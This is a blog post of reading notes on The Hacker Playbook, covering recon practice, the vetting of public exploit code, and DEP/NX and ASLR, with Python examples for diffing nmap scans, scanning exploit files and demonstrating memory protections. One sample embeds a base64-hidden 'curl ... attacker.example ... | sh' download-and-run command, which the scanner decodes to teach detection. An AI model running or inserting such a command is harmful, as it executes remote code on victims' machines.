The Hacker Playbook I - Section II - The Drive

Tags: reading notes, penetration testing, offensive and defensive security, network security

General Idea

This is going to be a note-taking article written while reading the book The Hacker Playbook I. I will stop playing HackTheBox or any sort of CTFs and boxes for a period of time and focus on reading more hands-on material, for instance this THP series (there are 3 books now).

I'll be taking notes on anything new that I consider of high value to me, on any references I should follow during the reading process to aid comprehension, and of course on the real mentality that a pentester/red teamer should have in a real-world situation. You know, handling virtual boxes is one thing, and the real world is a whole different story.

By the way, the book is fantastic.

The Mentality Thing

First, the author, Peter Kim, lists lots of tools, but I don't want to log every tool here since I won't be focusing on tools. Then he talks about the thing I care about: the difference between someone who mainly does CTFs and boxes and someone who is a real-life pentester or red teamer.

Recall the boxes I have been practicing on in the last few weeks. The pattern: first you get an IP, you nmap it, you look at the open ports. If 139/445 are open, you run smbclient against them. If 80, maybe gobuster or wpscan.

Now, from the book. Let's switch to the real world, where things get really complicated, and interesting. First, what you get is a domain instead of an IP address. And the initial step is not a simple nmap scan; it is not that straightforward. It involves lots of things: reconnaissance, usernames, emails and, most importantly, subdomains, etc.

The techniques you need are also very different. Passive recon first: get to know your target through all kinds of third-party infrastructure, like Shodan, censys.io, hunter.io, etc. You get information about the target without even touching the target's systems. Then, if you think you have enough information and decide to enter the next phase, active recon, there is also a lot more involved than just firing up an nmap scan. In a real-world scenario, what you should constantly be doing while carrying out active recon is, in my own words:

  • cooperating - communicate as much as possible with the client who hired you, because active recon is sometimes so loud that it causes disturbing side effects; for instance, the admin might receive endless warning text messages or emails if you are fuzzing URL paths on their web server.
  • recording - every scan and enumeration should be kept as an output report.
  • diffing - you should be able to detect changes in the customer's infrastructure on a timely basis. This gives you the edge to spot newly introduced vulnerabilities and, as a red teamer, quickly find a way to break into the system, leaving everything else to the target company's blue team and to the final assessment report.
  • redoing every step…
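The "recording" and "diffing" points above are easy to state and easy to skip in practice. The following is an added example, not code from the book or from the author: it parses two nmap grepable-output (-oG) files for the same scope and reports what changed between them, so a scan kept from last week can be compared with today's. The two scan texts embedded below are constructed samples for this example, not real scan results; the hostnames and addresses are made up.

```python
import re
from typing import Dict, List, Set, Tuple

OpenPort = Tuple[int, str, str]  # (port, proto, service)

# "Host: <ip> (<name>)\tPorts: <list>\tIgnored State: ..." lines from nmap -oG
HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+([^\t]*)")


def parse_gnmap(text: str) -> Dict[str, Set[OpenPort]]:
    """Map each host IP to the set of ports nmap reported as open.
    Filtered/closed entries are dropped so they never show up as 'changes'."""
    hosts: Dict[str, Set[OpenPort]] = {}
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue  # comment lines, 'Status: Up' lines, etc.
        ip, _name, ports_field = m.groups()
        open_ports = hosts.setdefault(ip, set())
        for entry in ports_field.split(", "):
            fields = entry.split("/")  # port/state/proto/owner/service/rpc/version/
            if len(fields) < 5:
                continue
            port, state, proto, _owner, service = fields[:5]
            if state == "open":
                open_ports.add((int(port), proto, service))
    return hosts


def diff_scans(old: Dict[str, Set[OpenPort]], new: Dict[str, Set[OpenPort]]) -> Dict[str, List]:
    """Hosts and open ports that appeared or disappeared between two scans."""
    opened = [(ip,) + p for ip, ports in new.items() for p in ports - old.get(ip, set())]
    closed = [(ip,) + p for ip, ports in old.items() for p in ports - new.get(ip, set())]
    return {
        "new_hosts": sorted(set(new) - set(old)),
        "gone_hosts": sorted(set(old) - set(new)),
        "opened": sorted(opened),
        "closed": sorted(closed),
    }


def report(delta: Dict[str, List]) -> str:
    """Human-readable change list, one finding per line."""
    lines = [f"NEW HOST   {ip}" for ip in delta["new_hosts"]]
    lines += [f"GONE HOST  {ip}" for ip in delta["gone_hosts"]]
    lines += [f"OPENED     {ip} {port}/{proto} ({service})" for ip, port, proto, service in delta["opened"]]
    lines += [f"CLOSED     {ip} {port}/{proto} ({service})" for ip, port, proto, service in delta["closed"]]
    return "\n".join(lines) if lines else "no changes"


# Constructed sample scans (not real output): day 1 ...
SCAN_DAY1 = """\
# Nmap 7.80 scan initiated (constructed sample for this example)
Host: 10.0.0.5 (web01.example.com)\tStatus: Up
Host: 10.0.0.5 (web01.example.com)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//nginx 1.18.0/, 25/filtered/tcp//smtp///\tIgnored State: closed (997)
Host: 10.0.0.7 (files.example.com)\tPorts: 445/open/tcp//microsoft-ds///, 139/open/tcp//netbios-ssn///\tIgnored State: filtered (998)
"""

# ... and day 2: web01 grew an 8080 listener, the file server is gone, a new RDP host appeared.
SCAN_DAY2 = """\
# Nmap 7.80 scan initiated (constructed sample for this example)
Host: 10.0.0.5 (web01.example.com)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//nginx 1.18.0/, 8080/open/tcp//http-proxy///\tIgnored State: closed (997)
Host: 10.0.0.9 ()\tPorts: 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (999)
"""


def sample_delta() -> Dict[str, List]:
    return diff_scans(parse_gnmap(SCAN_DAY1), parse_gnmap(SCAN_DAY2))


if __name__ == "__main__":
    print(report(sample_delta()))
```

Run each scan with -oA so the .gnmap file is always written alongside the normal and XML output, keep them under a dated directory per engagement, and run this comparison after every rescan; a port that opened overnight is exactly the kind of change the "diffing" bullet is about. Filtered ports are deliberately ignored so that firewall noise does not flood the report.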

The Difference Within

I have been missing the difference even between a pentester and a red teamer. Let me clarify it here.

Responsibility

A pentester's scope of responsibility, in my understanding, is narrower than that of a red teamer. Let's say a pentester is hired to test a company's infrastructure. The most important thing he has to do is find the vulnerabilities hidden in the system and file a report so the company can patch them, and no more.

On the other hand, a red teamer should not be limited to breaking systems. A red teamer should try his best to mimic real-world attacks, including but not limited to social engineering, spear phishing, etc.: all the ways you can think of to help test the target system and its subsystems.

Engagement Time

Pentesters often go for short-term engagements: days, or weeks.

Red teamers often go for long-term engagements, which need continuous effort to monitor and test the target.

Section II - The Drive - Exploiting Scanner Findings

About Payloads

You can find all kinds of shellcode and exploit code on the internet. But there are some things you must do before you put that code onto your customer's system and spin it up.

Some code might harm the system, and you would never know, because you never set foot in the source code.

So from today on, I will go through the most frequently used payloads, look at the source, and try to understand what is behind them.
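A first pass at "looking at the source" can be partly automated. The following is an added example, not code from the book or from the author: it pulls the "\x.." byte strings out of a downloaded exploit file, flags bytes that commonly break a payload (NUL, CR, LF), and decodes any long base64 run in the file to show what it really contains, since a hidden base64-encoded command is the usual way a fake public PoC turns on the person running it. The SAMPLE_EXPLOIT text is a constructed sample for this example: its byte string is placeholder values, not a working payload, and nothing in it is ever executed, only scanned.

```python
import base64
import re
from typing import Dict, List, Tuple

# Built here only so the sample is self-contained; in a real file you would
# see just the base64 string and would have to decode it yourself.
HIDDEN_COMMAND = "curl -s http://attacker.example/i | sh"

# Constructed sample of a public 'exploit' file. The \x bytes are placeholder
# values chosen to contain a NUL and a newline; they are not a real payload.
SAMPLE_EXPLOIT = r'''
#!/usr/bin/env python3
import os, base64, socket
buf = "\x48\x31\xc0\x00\x0a\x48\x89\xc7"
os.system(base64.b64decode("__BLOB__").decode())   # "setup"
'''.replace("__BLOB__", base64.b64encode(HIDDEN_COMMAND.encode()).decode())

SHELLCODE_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def extract_shellcode(src: str) -> List[bytes]:
    """Every "\\x.." string literal in the source, as raw bytes."""
    return [bytes.fromhex(m.replace("\\x", "")) for m in SHELLCODE_LITERAL.findall(src)]


def bad_chars(sc: bytes, bad: bytes = b"\x00\x0a\x0d") -> List[Tuple[int, int]]:
    """(offset, byte) pairs that would truncate or mangle the payload in
    common sinks such as C strings or line-based protocols."""
    return [(i, b) for i, b in enumerate(sc) if b in bad]


def _mostly_text(data: bytes) -> bool:
    return bool(data) and all(32 <= b < 127 or b in b"\t\r\n" for b in data)


def find_hidden_blobs(src: str) -> List[str]:
    """Decode long base64 runs; a result that is readable text is usually a
    command or URL the author did not want reviewed."""
    found = []
    for run in BASE64_RUN.findall(src):
        try:
            data = base64.b64decode(run, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        if _mostly_text(data):
            found.append(data.decode())
    return found


def review(src: str) -> Dict[str, object]:
    """Everything a reviewer wants on the table before the code is run."""
    shellcode = extract_shellcode(src)
    return {
        "shellcode": shellcode,
        "bad_chars": [bad_chars(sc) for sc in shellcode],
        "hidden_blobs": find_hidden_blobs(src),
    }


if __name__ == "__main__":
    result = review(SAMPLE_EXPLOIT)
    for sc, bad in zip(result["shellcode"], result["bad_chars"]):
        print(f"{len(sc)} bytes of shellcode, bad chars at {bad}")
    for blob in result["hidden_blobs"]:
        print(f"hidden text: {blob!r}")
```

This does not replace reading the code: it only surfaces the two things that are most often missed on a quick skim, the exact bytes you are about to inject and any encoded string the file decodes at run time. Anything it reports still has to be read and understood before the payload goes anywhere near a customer system.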

TODO
Pick some Metasploit Ruby modules, read the code and any references I may need.

DEP and ASLR

DEP

Reference: DEP from Microsoft

In short, DEP (Data Execution Prevention) marks certain ranges of memory pages non-executable, which gives the system some level of protection: even if an attacker can write shellcode into a piece of memory, if that memory is protected by DEP there is no way to execute it. Note that DEP only stops injected data from running; it does nothing against return-oriented programming, which reuses code that is already executable, which is why it is normally paired with ASLR.

And, according to the article, in the C programming language, memory allocated by malloc and HeapAlloc is non-executable.

And according to this article from Stack Exchange, DEP is a Windows-specific term. On Linux it is called NX (non-executable); feel free to follow the link in the post.
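The malloc claim above is easy to verify on Linux. The following is an added example, not code from the book or from the author, and it assumes Linux on x86-64 (it reports -1 elsewhere). It stages a 6-byte stub in ordinary heap memory and calls it inside a forked child, which dies with SIGSEGV because the heap is mapped without execute permission; it then stages the same bytes in an anonymous page, switches the page to read+execute with mprotect(2) through ctypes, and calls it successfully. The stub bytes are constructed test bytes for this example ("mov eax, 42 ; ret"), not a payload: all they do is return 42.

```python
import ctypes
import mmap
import os
import platform
import signal
import sys

# Constructed test bytes for this example (x86-64 "mov eax, 42 ; ret").
STUB = bytes.fromhex("b82a000000c3")
STUB_RESULT = 42
UNSUPPORTED = -1
PROT_RX = mmap.PROT_READ | mmap.PROT_EXEC if hasattr(mmap, "PROT_EXEC") else 0


def supported() -> bool:
    """The stub is x86-64 machine code and the checks use Linux-only calls."""
    return sys.platform.startswith("linux") and platform.machine() in ("x86_64", "AMD64")


def _call(addr: int) -> int:
    """Treat the bytes at addr as `int f(void)` and call them."""
    return ctypes.CFUNCTYPE(ctypes.c_int)(addr)()


def nx_blocks_heap_execution() -> int:
    """Put the stub in malloc'd (RW) memory and call it in a forked child.
    Returns 1 if the child died with SIGSEGV (heap is non-executable),
    0 if the stub actually ran, UNSUPPORTED if the check cannot run here."""
    if not supported():
        return UNSUPPORTED
    try:
        pid = os.fork()
    except OSError:
        return UNSUPPORTED
    if pid == 0:  # child: the fault happens here, the parent only observes it
        buf = ctypes.create_string_buffer(STUB, len(STUB))
        os._exit(0 if _call(ctypes.addressof(buf)) == STUB_RESULT else 3)
    _, status = os.waitpid(pid, 0)
    return int(os.WIFSIGNALED(status) and os.WTERMSIG(status) == signal.SIGSEGV)


def execute_from_exec_mapping() -> int:
    """Write the stub into an anonymous RW page, flip the page to RX with
    mprotect(2) (W^X: never writable and executable at once), then call it.
    Returns 42, or UNSUPPORTED if the platform refuses executable mappings."""
    if not supported():
        return UNSUPPORTED
    libc = ctypes.CDLL(None, use_errno=True)
    libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
    libc.mprotect.restype = ctypes.c_int
    try:
        page = mmap.mmap(-1, mmap.PAGESIZE, prot=mmap.PROT_READ | mmap.PROT_WRITE)
    except OSError:
        return UNSUPPORTED
    page.write(STUB)
    view = ctypes.c_char.from_buffer(page)
    addr = ctypes.addressof(view)
    del view  # release the exported buffer so page.close() is allowed later
    if libc.mprotect(addr, mmap.PAGESIZE, PROT_RX) != 0:
        page.close()
        return UNSUPPORTED
    result = _call(addr)
    page.close()
    return result


if __name__ == "__main__":
    print("heap execution blocked (1=yes, 0=no, -1=unsupported):", nx_blocks_heap_execution())
    print("stub run from RX page (42 expected, -1=unsupported):", execute_from_exec_mapping())
```

The point of the second function is not "how to run shellcode" but what an exploit must arrange for when DEP/NX is on: either the bytes land in memory that is already executable, or something (a call to mprotect or VirtualProtect, typically reached through a ROP chain) has to change the permissions first. Hardened kernels and some sandboxes refuse the mprotect call outright, and the function returns -1 in that case rather than crashing.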

ASLR

Reference: ASLR Wikipedia

ASLR (Address Space Layout Randomization), in short, randomizes where a program's memory regions (stack, heap, shared libraries and, for position-independent executables, the binary itself) are placed each time it runs, so an attacker cannot know in advance the exact address to return to in order to execute his malicious code.
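To see the randomization rather than take it on trust, the following added example (not code from the book or from the author; it assumes Linux and reads /proc) parses a process's /proc/<pid>/maps listing for the base of the stack, the heap and libc, checks whether ASLR is actually in force for the current process, and spawns a few fresh interpreters to show that each exec() gets a different stack base. MAPS_SAMPLE is a constructed maps listing for this example; the addresses in it are made up.

```python
import ctypes
import subprocess
import sys
from typing import Dict, List

# personality(2) flag that disables ASLR for one process (what setarch -R / gdb set).
ADDR_NO_RANDOMIZE = 0x0040000

# Constructed /proc/<pid>/maps excerpt for this example (addresses are made up).
MAPS_SAMPLE = """\
5591c8a00000-5591c8a01000 r--p 00000000 08:01 1234 /usr/bin/python3.10
5591c9a2e000-5591c9b4f000 rw-p 00000000 00:00 0 [heap]
7f2c1c800000-7f2c1c828000 r--p 00000000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7f2c1c828000-7f2c1c9bd000 r-xp 00028000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffd5e3b0000-7ffd5e3d1000 rw-p 00000000 00:00 0 [stack]
7ffd5e3f2000-7ffd5e3f4000 r-xp 00000000 00:00 0 [vdso]
"""


def region_bases(maps_text: str) -> Dict[str, int]:
    """Start address of [stack], [heap] and the first libc mapping.
    These are exactly the values an exploit would need to know and that
    ASLR hides from it."""
    bases: Dict[str, int] = {}
    for line in maps_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue  # anonymous mapping with no pathname
        start = int(parts[0].split("-")[0], 16)
        name = parts[5]
        key = name if name in ("[stack]", "[heap]") else ("libc" if "/libc" in name else None)
        if key and key not in bases:
            bases[key] = start
    return bases


def aslr_active() -> bool:
    """True when the kernel randomizes layouts (randomize_va_space != 0) and
    this process has not opted out via personality(ADDR_NO_RANDOMIZE)."""
    if not sys.platform.startswith("linux"):
        return False
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            if int(f.read().strip()) == 0:
                return False
        libc = ctypes.CDLL(None, use_errno=True)
        libc.personality.restype = ctypes.c_int
        return not (libc.personality(0xFFFFFFFF) & ADDR_NO_RANDOMIZE)  # 0xffffffff = query only
    except (OSError, ValueError, AttributeError):
        return False


def observe_child_layouts(runs: int = 3) -> List[Dict[str, int]]:
    """Spawn fresh interpreters and collect each one's region bases."""
    child = "print(open('/proc/self/maps').read())"
    layouts = []
    for _ in range(runs):
        try:
            proc = subprocess.run([sys.executable, "-c", child], capture_output=True, text=True, check=True)
        except (OSError, subprocess.CalledProcessError):
            return []
        layouts.append(region_bases(proc.stdout))
    return layouts


def distinct_stack_bases(runs: int = 3) -> int:
    """How many different stack bases were seen across `runs` fresh processes."""
    return len({layout.get("[stack]") for layout in observe_child_layouts(runs)})


if __name__ == "__main__":
    print("ASLR active in this process:", aslr_active())
    for i, layout in enumerate(observe_child_layouts(3), 1):
        print(f"child {i}: " + "  ".join(f"{k} {v:#x}" for k, v in sorted(layout.items())))
```

Two practical notes follow from this. First, fork() does not re-randomize: a forked child inherits the parent's layout, which is why a forking server leaks its addresses to anyone who can crash and retry (each try sees the same layout). Second, the personality check matters when testing exploits: gdb disables randomization for the debuggee by default, so an exploit that works under the debugger can fail the moment it is run for real.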

Google DEP and ASLR; there are tons of things to read about.

Bypass DEP and ASLR by Vinay Katoch
How do DEP and ASLR Work from Stack Exchange

Take Aways

In this section, the most important thing to remember is to try to be tool-independent. You grab some shellcode from the internet, but you have to know the code, you have to know what is behind it and how it works, and fully test it before you run it on the target machine. Dig deeper, and if something goes wrong you will know how to identify the problem and modify the code so the exploitation still works.

Here is another book recommendation, if you’re really willing to dive deeper.

The Shellcoder's Handbook: Discovering and Exploiting Security Holes


To be continued…

Copyright notice: this is an original article by the blogger, licensed under CC 4.0 BY-SA; please attach the original source link and this notice when reposting.
Original link: https://blog.csdn.net/heisejiuhuche/article/details/105896463
